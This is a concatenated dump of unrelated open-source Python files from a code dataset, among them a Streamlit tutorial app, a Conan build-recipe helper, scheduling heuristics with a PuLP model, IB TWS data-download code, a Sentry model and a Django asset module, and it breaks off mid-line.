(df)\n\n \"\"\"\n #\n ## Themes\n You Streamlit app will default to the Light Mode you see here unless you otherwise specify a theme. While you're\n developing you can simply go to the hamburger menu in the upper right, select Settings, and then choose if you want to\n switch to Dark Mode or create your own theme by choosing various colors and fonts. You can also set the them\n directly in your config file. Here's an [example app with different themes](https://share.streamlit.io/streamlit/theming-showcase/main),\n and [documentation on changing the theme](https://docs.streamlit.io/en/stable/theme_options.html).\n \"\"\"\n\n st.image(\"images/theming.gif\")\n\n \"\"\"\n\n ## Wide Mode, Page Title, Favicons and More\n As a final customization, you can use `st.set_page_config` to change default aspects of your app like the layout (wide or centered) and the\n default state of the sidebar (auto, expanded, or collapsed). For this app we have made it wide mode with the sidebar collapsed. You can also\n use `st.set_page_config` to set a custom page title or favicon. Note that for `st.set_page_config` to work, it must be the very first Streamlit\n function that you call in your app. Here is the page configuration we use for this app:\n\n \"\"\"\n\n st.code(\"\"\"\n st.set_page_config(page_title=\"Streamlit Getting Started Guide\", initial_sidebar_state=\"collapsed\")\n \"\"\", language=\"python\")\n\n \"\"\"\n #\n Now that you have a great looking app, let's move on to improving your app's performance. 🏎\n \"\"\"\n st.button(\"Next > Performance\", on_click=on_next_click)\n \n\nif state.nav == \"🏎 App Performance\":\n \"\"\"\n # Optimizing for app performance\n Your app looks good but it also needs to load and update quickly. Streamlit apps run just like Python scripts - from top to bottom - which\n means that anytime something changes in your app, like a widget changing a value, the whole script reruns. Streamlit does magic behind\n the scenes to make this run fast by default, but there are a few things you should do to help speed it up.\n\n ## @st.cache\n Any time you are loading in data, manipulating large datasets, or performing extensive computations you should think about creating a function\n and using the `@st.cache` decorator to store results in the local cache. That way the next time you call the cached function, Streamlit will\n skip executing the function and just returned the previously stored output. Which all makes your app much faster!\n\n Here is an example using ``@st.cache`:\n \"\"\"\n\n st.code(\"\"\"\n @st.cache\n def expensive_computation(a, b):\n time.sleep(2) # This makes the function take 2s to run\n return a * b\n\n a = 2\n b = 21\n res = expensive_computation(a, b)\n\n st.write(\"Result:\", res)\n\n \"\"\", language=\"python\")\n\n \"\"\"\n\n Note: `@st.cache` only works on functions. So make sure to put your data pull or computation in a function before using `@st.cache`.\n [Read more about @st.cache](https://docs.streamlit.io/en/stable/caching.html) in our documentation.\n\n ## Using buttons and forms\n Sometimes you have a lot of widgets and you want to wait until everything has been adjusted and entered before running the computation.\n In that case `st.button` and `st.beta_form` are going to be your best friends.\n\n MORE STUFF HERE\n\n ## Code clean up\n If after that your app is still running slowly, something someting about cleaning up your code for production... don't load in 10000 pandas rows....\n\n ADD IN STATE LATER ON\n\n \"\"\"\n\n \"\"\"\n #\n If you're app is running well, then now it's time to deploy and share it! 🚀\n \"\"\"\n st.button(\"Next > Deploying your app\", on_click=on_next_click)\n\n\nif state.nav == \"🚀 Deploying your App\":\n \"\"\"\n # Deploying your App\n You've made an app and now you're ready to share it. Congrats! Streamlit offers a free deployment platform called [Streamlit Sharing](https://streamlit.io/sharing)\n that you can use to deploy any public apps in a matter of minutes. Just host your app in a public GitHub repo, log in to Streamlit Sharing, and get your app deployed\n in one click! If you need secure, private deployment then try [Streamlit for Teams](https://streamlit.io/for-teams).\n\n \"\"\"\n\n st.image(\"images/deploy_large.gif\")\n\n \"\"\"\n You can also host apps yourself on your preferred platform and there are many resources online about how to containerize your app and deploy on Heroku, AWS, GCP, or Azure.\n\n Now you're all set! Click forward for more resources and happy Streamlit-ing! 🎈\n \"\"\"\n st.button(\"Next > More Resources\", on_click=on_next_click)\n\n\nif state.nav == \"🎈 More Resources\":\n \"\"\"\n # More Resources and Inspiration\n Docs\n Gallery\n Forum\n \"\"\"\n","repo_name":"kellyamanda/getting-started","sub_path":"get_started.py","file_name":"get_started.py","file_ext":"py","file_size_in_byte":14717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"9950000561","text":"from django.urls import path, include\nfrom . import views\n\napp_name = 'student'\n\nurlpatterns = [\n # HOME\n path('', views.index, name='index'),\n \n # EXAM\n path('exams', views.exams, name='exams'),\n path('results', views.results, name='results'),\n\n path('api/', include('student.api.urls')),\n]\n","repo_name":"SubhradeepSS/Exam_Portal","sub_path":"student/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"96"} +{"seq_id":"72869356155","text":"# from enum import Enum\nfrom conan import ConanFile\nfrom conan import tools\nfrom conan.tools.scm import Git\nfrom conan.tools.files import chdir, copy, get, apply_conandata_patches\nfrom conan.tools.layout import basic_layout\nfrom conan.tools.cmake import CMakeToolchain, CMakeDeps, CMake, cmake_layout\nfrom conan.tools.microsoft import MSBuildToolchain, MSBuild, msvs_toolset\nfrom conan.tools.env import VirtualBuildEnv, VirtualRunEnv\nfrom os.path import join\n\nimport os\nimport types\n\nclass IceProperties(object):\n def __init__(self):\n self.build_requires = []\n\nclass IceTools(object):\n def init(self):\n toolchain = None\n if self.ice_toolchain != None:\n toolchain = self.ice_toolchain\n elif self.ice_generator == \"cmake\":\n toolchain = \"cmake\"\n elif self.ice_generator == \"premake5\":\n toolchain = \"native\"\n else:\n toolchain = \"none\"\n\n self.ice_init(self.ice_generator or \"none\", toolchain)\n\n def build_requirements(self):\n if self._ice.toolchain_name == \"ninja\":\n self.tool_requires(\"ninja/[>=1.11.1 <2.0]\")\n\n if self._ice.generator_name == \"cmake\":\n self.tool_requires(\"cmake/[>=3.25.3 <4.0]\")\n if self._ice.generator_name == \"premake5\":\n self.tool_requires(\"premake-installer/5.0.0@iceshard/stable\")\n self.python_requires[\"premake-generator\"]\n\n def validate(self):\n if self.settings.build_type == None:\n raise ConanInvalidConfiguration(\"Multi configuration builds are no longer supported!\")\n\n if self.settings.compiler == \"msvc\":\n if self.settings.compiler.runtime not in [\"dynamic\", None]:\n raise ConanInvalidConfiguration(\"Only Dynamic runtimes 'MD' and 'MDd' are supported!\")\n\n def layout(self):\n self.ice_layout()\n\n def source(self):\n self.ice_source()\n\n def generate(self):\n self.ice_generate()\n\n def build(self):\n self.ice_build()\n\n def package(self):\n # Calls 'ice_package_sources' with a specialized copy method\n if chdir(self, self.source_folder):\n def CopyFromSource(self, pattern, src, dst, excludes=None, keep_path=False):\n copy(self, pattern, src=join(self.source_folder, src), dst=join(self.package_folder, dst), excludes=excludes, keep_path=keep_path)\n self.ice_copy = types.MethodType(CopyFromSource, self)\n self.ice_package_sources()\n del self.ice_copy\n else:\n self.output.error(\"Failed to enter source folder!\")\n\n # Calls 'ice_package_artifacts' with a specialized copy method\n if chdir(self, self.build_folder):\n def CopyFromBuild(self, pattern, src, dst, excludes=None, keep_path=False):\n copy(self, pattern, src=join(self.build_folder, src), dst=join(self.package_folder, dst), excludes=excludes, keep_path=keep_path)\n self.ice_copy = types.MethodType(CopyFromBuild, self)\n self.ice_package_artifacts()\n del self.ice_copy\n else:\n self.output.error(\"Failed to enter build folder!\")\n\n # Iceshard method implementations\n def _ice_final_toolchain(self):\n if self.ice_toolchain == \"native\":\n if self.settings.compiler == \"msvc\":\n return \"msbuild\"\n else:\n return \"makefile\"\n else:\n return self.ice_toolchain\n\n def ice_init(self, generator, toolchain):\n self._ice = IceProperties()\n self._ice.toolchain_name = toolchain\n\n # Set the generator name if it's known\n if generator == None or generator == \"none\":\n self._ice.generator_name = \"none\"\n elif generator == \"premake5\":\n self._ice.generator_name = generator\n elif generator == \"cmake\":\n self._ice.generator_name = generator\n else:\n self.output.error(\"Unknown project generator\")\n\n def ice_layout(self, generator=None):\n if generator == None:\n generator = self._ice.generator_name\n\n if generator == \"cmake\":\n cmake_layout(self)\n else:\n basic_layout(self)\n\n # Override some specific folders\n self.folders.source = \"{}-{}\".format(self.name, self.version)\n\n if generator == \"premake5\":\n self.folders.generators = self.folders.source\n self.folders.build = self.folders.source\n\n def ice_source_key(self, version):\n return version\n\n def ice_apply_patches(self):\n apply_conandata_patches(self)\n\n # for patch in self.conan_data.get(\"patches\", { }).get(self.ice_source_key(self.version), []):\n # tools.patch(base_path=base_path, patch_file=\"{}/{}\".format(self.build_folder, patch[\"patch_file\"]))\n\n def ice_source(self):\n source_info = self.conan_data[\"sources\"][self.ice_source_key(self.version)]\n if \"branch\" in source_info:\n git = Git(self)\n git.clone(source_info[\"url\"], target=\".\")\n git.checkout(source_info[\"branch\"])\n if \"commit\" in source_info:\n git.checkout(source_info[\"commit\"])\n elif \"tag\" in source_info:\n git = Git(self)\n git.clone(source_info[\"url\"], target=\".\")\n git.checkout(source_info[\"tag\"])\n else:\n get(self, **source_info)\n\n # Apply patches if any\n self.ice_apply_patches()\n\n def ice_generate(self, generator=None, toolchain=None):\n if generator == None:\n generator = self._ice.generator_name\n if toolchain == None:\n toolchain = self._ice_final_toolchain()\n\n if generator == \"cmake\":\n # TODO: assert toolchain == 'cmake'\n\n if toolchain == \"ninja\":\n toolchain = CMakeToolchain(self, \"Ninja\")\n else:\n toolchain = CMakeToolchain(self)\n deps = CMakeDeps(self)\n\n self.ice_generate_cmake(toolchain, deps)\n\n toolchain.generate()\n deps.generate()\n\n if generator == \"premake5\":\n PremakeDeps = self.python_requires[\"premake-generator\"].module.PremakeDeps\n deps = PremakeDeps(self)\n self.ice_generate_premake(deps)\n deps.generate()\n\n # Generates premake5 binary env\n ms = VirtualBuildEnv(self)\n ms.vars().save_script('iceshard_tools')\n\n premake_generators_vstudio = {\n \"11\": \"vs2012\",\n \"12\": \"vs2013\",\n \"14\": \"vs2015\",\n \"15\": \"vs2017\",\n \"16\": \"vs2019\",\n \"17\": \"vs2022\",\n }\n\n # Build commandline arguments\n premake_action = \"gmake2\"\n if self.settings.compiler == \"msvc\":\n premake_action = premake_generators_vstudio.get(str(self.settings.compiler.version), \"vs2022\")\n\n premake_commandline = \"premake5 {} --file={}\".format(premake_action, join(self.source_folder, \"premake5.lua\"))\n premake_commandline += \" --arch={}\".format(self.settings.arch)\n for key, value in self.options.items():\n if value == 'True':\n premake_commandline += \" --{}\".format(key)\n elif value != 'False':\n premake_commandline += \" --{}={}\".format(key, value)\n\n # Generate premake5 projects\n self.run(premake_commandline, env=['iceshard_tools'])\n\n if toolchain == \"msbuild\":\n toolchain = MSBuildToolchain(self)\n self.ice_toolchain_msbuild(toolchain)\n toolchain.generate()\n\n def ice_build(self, toolchain=None):\n pass\n\n ##\n # Specific generator functions\n ##\n def ice_generate_cmake(self, toolchain, deps):\n pass\n def ice_generate_premake(self, deps):\n pass\n def ice_toolchain_msbuild(self, deps):\n pass\n\n ##\n # Called by IceTools when packagin sources and artifacts\n ##\n def ice_package_sources(self):\n pass\n\n def ice_package_artifacts(self):\n pass\n\n ##\n # Methods used to call build systems\n ##\n def ice_run_msbuild(self, solution, target=None, retarget=False):\n msbuild_platforms = {\n \"x86\": \"Win32\",\n \"x86_64\": \"x64\",\n }\n\n cmdline = \"msbuild {} /p:Configuration={} /p:Platform={}\".format(solution, self.settings.build_type, msbuild_platforms.get(str(self.settings.arch), None))\n if target != None:\n cmdline += \" /target:{}\".format(target)\n if retarget:\n cmdline += \" /p:PlatformToolset={}\".format(msvs_toolset(self))\n self.run(cmdline)\n # msbuild = MSBuild(self)\n # msbuild.build(solution, targets=targets)\n\n def ice_run_cmake(self, variables=[], target=None):\n cmake = CMake(self)\n cmake.configure(variables=variables)\n cmake.build(target=target)\n\n def ice_run_make(self, target=None, build_type=None):\n if build_type == None:\n build_type = self.settings.build_type\n\n self.run(\"make -f Makefile config={} {}\".format(str(build_type).lower(), \"\" if target == None else target), env=[])\n\n##\n## Conan package class.\nclass ConanIceshardTools(ConanFile):\n name = \"conan-iceshard-tools\"\n version = \"0.9.1\"\n user = \"iceshard\"\n channel = \"stable\"\n","repo_name":"iceshard-engine/conan-recipes","sub_path":"recipes/conan-iceshard-tools/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":9401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"41320250670","text":"import ipaddress\n\ndef convert_ip_asn(host_ip):\n \"\"\"\n 引数で受け取ったホストIPアドレスをAS番号に変換する関数\n \"\"\"\n # 基底となる4octet ASN\n base_asn = 4200000000\n\n # 入力したIPを32bitバイナリに変換し下位3オクテット(9bit目から)を10進数変換\n convert_ip = int(format(int(ipaddress.IPv4Address(host_ip)),'032b')[8:], 2)\n\n # ASNの算出\n return base_asn + convert_ip\n\n# 変換対象のIP addressを入力\ninput_ip = input('Input IP Address: ')\n\nprint('AS Number: ' + str(convert_ip_asn(input_ip)))\n","repo_name":"markunet/Python3_Junk_Files","sub_path":"ip_to_asn.py","file_name":"ip_to_asn.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"71941777915","text":"from utils import ORDERS, ORDER, PRODUCT, LINES, WORKER, WORKERS\nimport numpy as np\nimport pulp\n\n###############################################\n# Models for Problem 1 #\n###############################################\n\ndef meonf(orders:ORDERS):\n \"\"\"\n Min Excpeted Overtime Numbers First\n \"\"\"\n num_orders = len(orders.orders_dict)\n finished = 0\n time = 0\n \n deadline_orders = dict()\n added = dict()\n for order in orders.orders_dict.values():\n if order.deadline not in deadline_orders.keys():\n added[order.deadline] = False\n deadline_orders[order.deadline] = list()\n deadline_orders[order.deadline].append(order)\n \n deadlines = sorted(deadline_orders) \n nums_ddl = len(deadlines)\n cur_deadline = deadlines[0]\n if nums_ddl > 1:\n next_ddl_id = 1\n next_deadline = deadlines[next_ddl_id]\n orders_cache = deadline_orders[cur_deadline]\n \n orders_cache: list()\n while(finished != num_orders):\n # action for next deadline coming\n flag = True\n for order in orders_cache:\n if order.finished == False:\n flag = False \n if time > cur_deadline or flag:\n if next_deadline != -1 and added[next_deadline] == False:\n added[next_deadline] = True\n cur_deadline = next_deadline\n next_ddl_id += 1\n next_deadline = deadlines[next_ddl_id] if next_ddl_id < nums_ddl else -1\n for order in deadline_orders[cur_deadline]:\n orders_cache.append(order)\n\n # find the order to achieve the minimal expected overtime numbers\n order_id = None\n min_overtime_nums = None\n min_sum_time = None\n \n for order in orders_cache:\n order: ORDER\n if order.finished:\n continue\n vir_time = time + order.sum_time\n nums = cal_overtime_nums(orders_cache, vir_time)\n \n if min_overtime_nums is None or nums < min_overtime_nums:\n min_overtime_nums = nums\n order_id = order.id\n min_sum_time = order.sum_time\n elif nums == min_overtime_nums and min_sum_time > order.sum_time:\n order_id = order.id\n min_sum_time = order.sum_time \n \n order = orders.orders_dict[order_id]\n order: ORDER\n \n # begin work\n time = order.begin_order(time)\n finished += 1\n \n return orders \n\n\ndef cal_overtime_nums(orders_cache, vir_time):\n nums = 0\n for order in orders_cache:\n order: ORDER\n if order.finished:\n continue\n if order.deadline < vir_time:\n nums += 1\n return nums\n\n\ndef dmsf(orders: ORDERS):\n \"\"\"\n Dealine & Min Sum Time First\n \"\"\"\n num_orders = len(orders.orders_dict)\n finished = 0\n time = 0\n \n while(finished != num_orders):\n min_deadline = None\n min_sum_time = None\n order_id = None\n for id, order in orders.orders_dict.items():\n order: ORDER\n if order.finished:\n continue\n if min_deadline is None or min_deadline > order.deadline:\n min_deadline = order.deadline\n min_sum_time = order.sum_time\n order_id = id\n elif min_deadline == order.deadline and min_sum_time > order.sum_time:\n min_sum_time = order.sum_time\n order_id = id\n \n order = orders.orders_dict[order_id]\n order: ORDER\n # begin work\n time = order.begin_order(time)\n finished += 1\n return orders\n\n\ndef msf(orders: ORDERS):\n \"\"\"\n Min Sum Time First\n \"\"\"\n num_orders = len(orders.orders_dict)\n finished = 0\n time = 0\n \n while(finished != num_orders):\n # find the minimal remaining time's order\n min_sum_time = None\n order_id = None\n for id, order in orders.orders_dict.items():\n order: ORDER\n if order.finished:\n continue\n if min_sum_time is None or min_sum_time > order.sum_time:\n min_sum_time = order.sum_time\n order_id = id\n order = orders.orders_dict[order_id]\n order: ORDER\n # begin work\n time = order.begin_order(time)\n finished += 1\n return orders\n\n\ndef derf(orders: ORDERS):\n \"\"\"\n Dealine & Earliest Remaining Time First\n \"\"\"\n num_orders = len(orders.orders_dict)\n finished = 0\n time = 0\n \n while(finished != num_orders):\n # find the minimal remaining time's order\n min_deadline = None\n min_rm_time = None\n order_id = None\n for id, order in orders.orders_dict.items():\n order: ORDER\n if order.finished:\n continue\n if min_deadline is None or min_deadline > order.deadline:\n min_deadline = order.deadline\n min_rm_time = order.sum_time\n order_id = id\n elif min_deadline == order.deadline and min_rm_time > order.rm_time:\n min_rm_time = order.sum_time\n order_id = id\n \n order = orders.orders_dict[order_id]\n order: ORDER\n # begin work\n time = order.begin_order(time)\n finished += 1\n return orders\n\n\ndef erf(orders: ORDERS):\n \"\"\"\n Earliest Remaining Time First\n \"\"\"\n num_orders = len(orders.orders_dict)\n finished = 0\n time = 0\n \n while(finished != num_orders):\n # find the minimal remaining time's order\n min_rm_time = None\n order_id = None\n for id, order in orders.orders_dict.items():\n order: ORDER\n if order.finished:\n continue\n if min_rm_time is None or min_rm_time > order.rm_time:\n min_rm_time = order.rm_time\n order_id = id\n order = orders.orders_dict[order_id]\n order: ORDER\n # begin work\n time = order.begin_order(time)\n finished += 1\n return orders\n\n\n###############################################\n# Models for Problem 2 #\n###############################################\n\ndef lip(work_num, workers, times):\n \"\"\"\n Linear Integer Programming\n \"\"\"\n ots = times / np.sum(times)\n # create problem\n problem = pulp.LpProblem(\"Worker Allocation\", pulp.LpMaximize)\n # target\n x = [[pulp.LpVariable(f\"x_{i}_{j}\", lowBound=0, upBound=1, cat=pulp.LpInteger) for j in range(12)] for i in range(20)]\n # object\n object = pulp.lpSum(ots[j] * x[i][j] * workers[i][j] for i in range(20) for j in range(12))\n problem += object\n # constraint\n for i in range(20):\n problem += pulp.lpSum(x[i][j] for j in range(12)) <= 1\n for j in range(12):\n problem += pulp.lpSum(x[i][j] for i in range(20)) <= work_num[j] \n # get result\n problem.solve()\n result = np.zeros(shape=(20, 12))\n for i in range(20):\n for j in range(12):\n result[i][j] = pulp.value(x[i][j]) \n return result \n\n\n###############################################\n# Models for Problem 3 #\n###############################################\n\n","repo_name":"heatingma/MathorCup-2023C","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7388,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"26033542835","text":"import json\nimport numpy as np\nimport pandas as pd\n\nimport marksman_db as mdb\nimport marksman_extras as me\nimport postgresql_db as db\n\n\nfrom datetime import datetime, timedelta, date\nfrom ib_insync import util, Stock\nfrom itertools import product\nfrom math import floor, ceil\nfrom tzlocal import get_localzone\nfrom uuid import uuid4\n\nfrom marksman_objects import Ticker\nfrom postgresql_db import conn as SQLconn\n\n\n\n\n\n# IB TWS query:\ndef ticker_historical_data(ib, ticker: Ticker, startDate, endDate, barSizeSet,\n whatToShow: float='TRADES', useRTH=True,\n timeout:float=600, **kwargs):\n contract = Stock(ticker.symbol, ticker.exchange, ticker.currency)\n barSizeSet = me.bars_size(barSizeSet)\n if not endDate: endDateDT = datetime.now(startDate.tzinfo)\n else: endDateDT = endDate\n return ib.reqHistoricalData(contract, endDateTime=endDate,\n durationStr=me.duration(endDateDT-startDate, **kwargs),\n barSizeSetting=barSizeSet, whatToShow=whatToShow,\n useRTH=useRTH, timeout=timeout)\n\n\n# query from IB TWS amd convert to pandas dataframe:\ndef ticker_historical_data_trades_populate_db(ib, tickers, barSizes, startDate,\n endDate, uploader, useRTH=None):\n day = timedelta(days=1)\n for barsSize in barSizes:\n barSizeStr = me.bars_size(barsSize)\n barSizeTD = me.td_parser(barSizeStr)\n if useRTH is None:\n if barSizeTD <= timedelta(minutes=30):\n useRTH, ORTH = False, ''\n else:\n useRTH, ORTH = True, ''\n else:\n if useRTH or barSizeTD <= timedelta(minutes=30):\n ORTH = ''\n else:\n ORTH = '_ORTH'\n\n for ticker in tickers:\n bars = ticker_historical_data(ib, Ticker(symbol=ticker), startDate,\n endDate, barsSize, useRTH=useRTH,\n timeout=60000000)\n df = util.df(bars)\n df['ib_is_date'] = df['date']\n # print(df)\n if np.issubdtype(df.dtypes[0], np.object):\n if isinstance(df.loc[0, 'date'], date):\n df['date'] = df['date'].map(lambda x: datetime \\\n .combine(x, datetime.min.time())).dt \\\n .tz_localize('America/New_York', ambiguous='infer',\n nonexistent='shift_backward')\n\n if barSizeTD >= timedelta(weeks = 1):\n df['date'] = df['date'].shift(periods=1)\n df.drop(labels=0, inplace=True)\n elif np.issubdtype(df.dtypes[0], np.datetime64):\n df['date'] = me.to_timezone(df['date'], get_localzone())\n\n df['ny_date'] = df['date'].dt.tz_convert('America/New_York').dt.tz_localize(None)\n df['volume'] = df['volume'].map(lambda x: x*100)\n widths = df['date'].diff().shift(periods=-1)\n last = df['date'].iloc[-1]\n widths.iloc[-1] = min(me.to_timezone(datetime.now(), me.get_timezone(last)) - last,\n barSizeTD)\n df['duration'] = widths.map(lambda x: [x, barSizeTD][[x, barSizeTD].index(min(x, barSizeTD))]).map(lambda x: x.total_seconds())\n\n if barSizeTD > day:\n xSeconds = 365 * 24 * 3600\n elif barSizeTD == day:\n xSeconds = 51 * 5 * 24 * 3600\n elif barSizeTD < day:\n xSeconds = 51 * 5 * 6.5 * 3600\n df['close-open'] = df['close'] - df['open']\n df['high-low'] = df['high'] - df['low']\n df['percent'] = df['close-open'] / df['open']\n df['percent_high-low'] = 2 * df['high-low'] / (df['high'] + df['low'])\n df['percent_year'] = xSeconds * df['percent'] / df['duration']\n df['money_moved'] = df['average'] * df['volume']\n df['close-open_volume'] = df['close-open'] * df['volume']\n df.set_index(['date'], inplace=True)\n print(tuple(df.index.names))\n print(df.dtypes)\n print(df)\n uploader(f'{ticker}_{barSizeStr}{ORTH}', df)\n","repo_name":"Mixelll/Marksman","sub_path":"marksman_ib_queries.py","file_name":"marksman_ib_queries.py","file_ext":"py","file_size_in_byte":4281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"23906436071","text":"from django.db import models\nfrom django.utils import timezone\nfrom django.utils.translation import ugettext_lazy as _\nfrom sentry.db.models import BoundedPositiveIntegerField, Model, FlexibleForeignKey, sane_repr\n\n\nclass GroupResolution(Model):\n \"\"\"\n Describes when a group was marked as resolved.\n \"\"\"\n\n __core__ = False\n\n class Type:\n in_release = 0\n in_next_release = 1\n\n class Status:\n pending = 0\n resolved = 1\n\n group = FlexibleForeignKey(\"sentry.Group\", unique=True)\n # the release in which its suggested this was resolved\n # which allows us to indicate if it still happens in newer versions\n release = FlexibleForeignKey(\"sentry.Release\")\n type = BoundedPositiveIntegerField(\n choices=((Type.in_next_release, \"in_next_release\"), (Type.in_release, \"in_release\")),\n null=True,\n )\n actor_id = BoundedPositiveIntegerField(null=True)\n datetime = models.DateTimeField(default=timezone.now, db_index=True)\n status = BoundedPositiveIntegerField(\n default=Status.pending,\n choices=((Status.pending, _(\"Pending\")), (Status.resolved, _(\"Resolved\"))),\n )\n\n class Meta:\n db_table = \"sentry_groupresolution\"\n app_label = \"sentry\"\n\n __repr__ = sane_repr(\"group_id\", \"release_id\")\n\n @classmethod\n def has_resolution(cls, group, release):\n \"\"\"\n Determine if a resolution exists for the given group and release.\n\n This is used to suggest if a regression has occurred.\n \"\"\"\n try:\n res_type, res_release, res_release_datetime = (\n cls.objects.filter(group=group)\n .select_related(\"release\")\n .values_list(\"type\", \"release__id\", \"release__date_added\")[0]\n )\n except IndexError:\n return False\n\n # if no release is present, we assume we've gone from \"no release\" to \"some release\"\n # in application configuration, and thus this must be older\n if not release:\n return True\n\n if res_type in (None, cls.Type.in_next_release):\n if res_release == release.id:\n return True\n elif res_release_datetime > release.date_added:\n return True\n return False\n elif res_type == cls.Type.in_release:\n if res_release == release.id:\n return False\n if res_release_datetime < release.date_added:\n return False\n return True\n else:\n raise NotImplementedError\n","repo_name":"imfht/djangoapps","sub_path":"sentry-master/src/sentry/models/groupresolution.py","file_name":"groupresolution.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"95"} +{"seq_id":"8835041180","text":"def create_master_menu(menus):\n \"\"\"\n Given an array of foodtruck menus where each menu is an array of dishes served, \n return one array which contains all items that will be served at the festival, \n without duplicates.\n \"\"\"\n master_menu = []\n def unpack_menu(menu, master_menu):\n for item in menu:\n master_menu.append(item)\n \n for menu in menus:\n unpack_menu(menu, master_menu)\n \n return set(master_menu)\n\ntest = create_master_menu([[\"calzone\", \"pizza\", \"pasta\"], [\"pizza\", \"caesar salad\"], [\"caesar salad\", \"green salad\", \"greek salad\"]])\nprint(test)","repo_name":"vega-polaris/Algos","sub_path":"javascript_challenges/food_trucks.py","file_name":"food_trucks.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"990541273","text":"from bddrest import status, response, when, Update\n\nfrom .helpers import LocalApplicationTestCase, oauth_mockup_server\nfrom dolphin.models import Member, Tag, Organization, OrganizationMember\n\n\nclass TestTag(LocalApplicationTestCase):\n\n @classmethod\n def mockup(cls):\n session = cls.create_session()\n\n cls.member1 = Member(\n title='First Member',\n email='member1@example.com',\n access_token='access token 1',\n phone=123456789,\n reference_id=1,\n )\n session.add(cls.member1)\n\n cls.member2 = Member(\n title='seconde Member',\n email='member2@example.com',\n access_token='access token 2',\n phone=123456788,\n reference_id=2,\n )\n session.add(cls.member2)\n\n cls.organization1 = Organization(\n title='first-organization',\n )\n session.add(cls.organization1)\n\n cls.organization2 = Organization(\n title='second-organization',\n )\n session.add(cls.organization2)\n session.flush()\n\n organization_member1 = OrganizationMember(\n organization_id=cls.organization1.id,\n member_id=cls.member1.id,\n role='owner',\n )\n session.add(organization_member1)\n\n organization_member2 = OrganizationMember(\n organization_id=cls.organization2.id,\n member_id=cls.member2.id,\n role='owner',\n )\n session.add(organization_member2)\n\n cls.tag1 = Tag(\n title='already exist',\n organization_id=cls.organization1.id,\n )\n session.add(cls.tag1)\n\n cls.tag2 = Tag(\n title='second tag',\n organization_id=cls.organization1.id,\n )\n session.add(cls.tag2)\n session.commit()\n\n def test_update(self):\n self.login(\n email=self.member1.email,\n organization_id=self.organization1.id\n )\n title = 'first tag'\n description = 'A description for tag'\n\n with oauth_mockup_server(), self.given(\n f'Updating a tag',\n f'/apiv1/tags/id: {self.tag1.id}',\n f'UPDATE',\n json=dict(\n title=title,\n description=description,\n ),\n ):\n assert status == 200\n assert response.json['title'] == title\n assert response.json['description'] == description\n assert response.json['id'] == self.tag1.id\n\n when('Tag not found', url_parameters=dict(id=0))\n assert status == 404\n\n when(\n 'Intended tag with string type not found',\n url_parameters=dict(id='Alphabetical')\n )\n assert status == 404\n\n when(\n 'Title is repetitive',\n json=dict(title=self.tag2.title)\n )\n assert status == '600 Repetitive Title'\n\n when(\n 'Title is as the same it is',\n json=dict(title=title)\n )\n assert status == 200\n\n when('Trying to pass without form parameters', json={})\n assert status == '708 Empty Form'\n\n when(\n 'Title length is more than limit',\n json=dict(title=((50 + 1) * 'a'))\n )\n assert status == '704 At Most 50 Characters Are Valid For Title'\n\n when(\n 'Trying to pass with none title',\n json=dict(title=None)\n )\n assert status == '727 Title Is Null'\n\n when(\n 'Description length is less than limit',\n json=Update(description=((8192 + 1) * 'a')),\n )\n assert status == '703 At Most 8192 Characters Are Valid For ' \\\n 'Description'\n\n self.login(\n email=self.member2.email,\n organization_id=self.organization2.id\n )\n when(\n 'Updating a tag by a member from another organization',\n authorization=self._authentication_token\n )\n assert status == 403\n\n when(\n 'Invalid parameter is in the form',\n json=dict(invalid_param='External parameter'),\n )\n assert status == '707 Invalid field, only following fields are ' \\\n 'accepted: title, description'\n\n when('Request is not authorized', authorization=None)\n assert status == 401\n\n","repo_name":"Carrene/dolphin","sub_path":"tests/test_tag_update.py","file_name":"test_tag_update.py","file_ext":"py","file_size_in_byte":4607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"118776829","text":"#!/usr/bin/env python\n\"\"\"\n该模块是cmdb中所有关于设备资产信息的处理方法\nauthor: wangsong 2016-09-20\n\"\"\"\n\nimport json\nfrom datetime import datetime\n\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db.models import Q\n\nfrom afcat.account.core.permission import operator_audit_decorator\nfrom afcat.api.libs.public import Logger, response_format\nfrom afcat.cmdb import models\nfrom afcat.cmdb.libs import base, common\n\nlogger = Logger(__name__)\n\n\ndef get_asset_list(page_index, conditions, custid, perm_id_list=None, per_count=None):\n \"\"\"\n 获取设备资产的基础信息(首页显示的所有资产信息)\n :param conditions: str类型,查询过滤条件,目前仅支持: 按设备编号、资产编号、型号、管理IP模糊匹配\n :param page_index: 当前页码\n :param request: get\n :return: 所有资产信息的列表\n \"\"\"\n _result_list = list()\n result = response_format()\n page_split_result = {\"record\": _result_list, \"addperm\": True}\n\n try:\n record_list = _load_equipment_list(conditions.strip(), custid, perm_id_list)\n # 获得分页结果\n page_split_result.update(common.page_split(record_list, page_index, per_count))\n # 获取分页后的记录\n equipment_obj_list = page_split_result.get(\"record\")\n\n if record_list.count() > 0:\n for equipment_obj in equipment_obj_list:\n equipment_info = dict(id=equipment_obj.id, assetname=equipment_obj.assetname,\n assetno=equipment_obj.assetno,\n unitinfo=equipment_obj.slotindex,\n assettype=equipment_obj.assettype.name if equipment_obj.assettype else \"\",\n room=equipment_obj.room.name if equipment_obj.room else \"\",\n cabinet=equipment_obj.cabinet,\n model=equipment_obj.model,\n netarea=equipment_obj.netarea.name if equipment_obj.netarea else \"\",\n factory=equipment_obj.factory.name if 